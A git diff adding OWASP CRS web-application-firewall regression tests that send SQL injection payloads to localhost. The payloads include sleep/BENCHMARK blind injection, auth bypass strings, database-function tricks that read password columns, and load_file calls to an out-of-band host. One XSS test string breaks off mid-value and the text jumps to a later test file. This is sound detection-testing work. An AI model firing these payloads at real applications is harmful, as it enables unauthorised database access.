"942140" + - test_title: 942140-13 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-14 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-15 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DATABASE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-16 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "schema_name" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-17 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "information_schema" + version: HTTP/1.0 + output: + log_contains: id "942140" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml new file mode 100644 index 00000000..3c169b44 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml 
@@ -0,0 +1,329 @@ +--- +meta: + author: "Christian Folini,azurit" + description: Various SQL injection tests + enabled: true + name: 942150.yaml +tests: + - test_title: 942150-1 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-4 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-5 + 
stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-6 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-7 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-8 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-9 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-10 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-11 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-12 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-13 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: 
"var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-14 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-15 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-16 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\\foobar.txt\" or sleep(4) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-17 + desc: "SQLite 'json' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-18 + desc: "SQLite 
'json_valid' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-19 + desc: "SQLite 'glob' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log_contains: id "942150" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml new file mode 100644 index 00000000..c749e8d8 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml 
@@ -0,0 +1,190 @@ +--- +meta: + author: "Christian Folini,azurit" + description: Various SQL injection tests + enabled: true + name: 942151.yaml +tests: + - test_title: 942151-1 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-3 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-4 + desc: "Simple injection using 'fetch_in_set'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log_contains: id 
"942151" + - test_title: 942151-5 + desc: "SQL injection using 'likelihood' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-6 + desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-7 + desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-8 + desc: "SQL injection using PostgreSQL starts_with() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-9 + desc: "SQL injection using 
PostgreSQL jsonb_pretty() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-10 + desc: "SQL injection using PostgreSQL json_build_object() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=...(json_build_object(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-11 + desc: "SQL injection using unistr() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=unistr(password)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml new file mode 100644 index 00000000..097ed23f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml 
@@ -0,0 +1,55 @@ +--- +meta: + author: "Franziska Bühler" + description: Various SQL injection tests + enabled: true + name: 942152.yaml +tests: + - test_title: 942152-1 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_title: 942152-2 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_title: 942152-3 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml new file mode 100644 index 00000000..e8013ec5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml 
@@ -0,0 +1,175 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler" + description: None + enabled: true + name: 942160.yaml +tests: + - test_title: 942160-1 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-2 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-3 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-4 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-5 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: 
+ input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-6 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-7 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-8 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-9 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-10 + desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log_contains: id "942160" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml new file mode 100644 index 00000000..c3f0f366 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml 
@@ -0,0 +1,71 @@ +--- +meta: + author: "Franziska Bühler" + description: None + enabled: true + name: 942170.yaml +tests: + - test_title: 942170-1 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_title: 942170-2 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3B%20sleep%280%29" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_title: 942170-3 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=I%20sleep%20well%21" + version: HTTP/1.0 + output: + no_log_contains: id "942170" + - test_title: 942170-4 + desc: "Status Page Test - SQL injection test with select if(x" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=select+if(x" + version: HTTP/1.0 + 
output: + log_contains: id "942170" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml new file mode 100644 index 00000000..7dbbf800 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml 
@@ -0,0 +1,137 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942180.yaml +tests: + - test_title: 942180-1 + desc: "basic SQL authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log_contains: id "942180" + - test_title: 942180-2 + desc: "XSS test based on portswigger XSS cheatsheet" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: "javascript:\"/*'/*`/*--> 5'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log_contains: id "942251" + - test_title: 942251-2 + desc: "Detects having injections negative test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=having%20fun" + version: HTTP/1.0 + output: + no_log_contains: id "942251" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml new file mode 100644 index 00000000..0c440ab6 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml @@ -0,0 +1,24 @@ +--- +meta: + author: "Christian S.J. Peron, Christian Folini" + description: None + enabled: true + name: 942260.yaml +tests: + - test_title: 942260-1 + desc: "Basic SQL authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log_contains: id "942260" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml new file mode 100644 index 00000000..bf16aaec --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml 
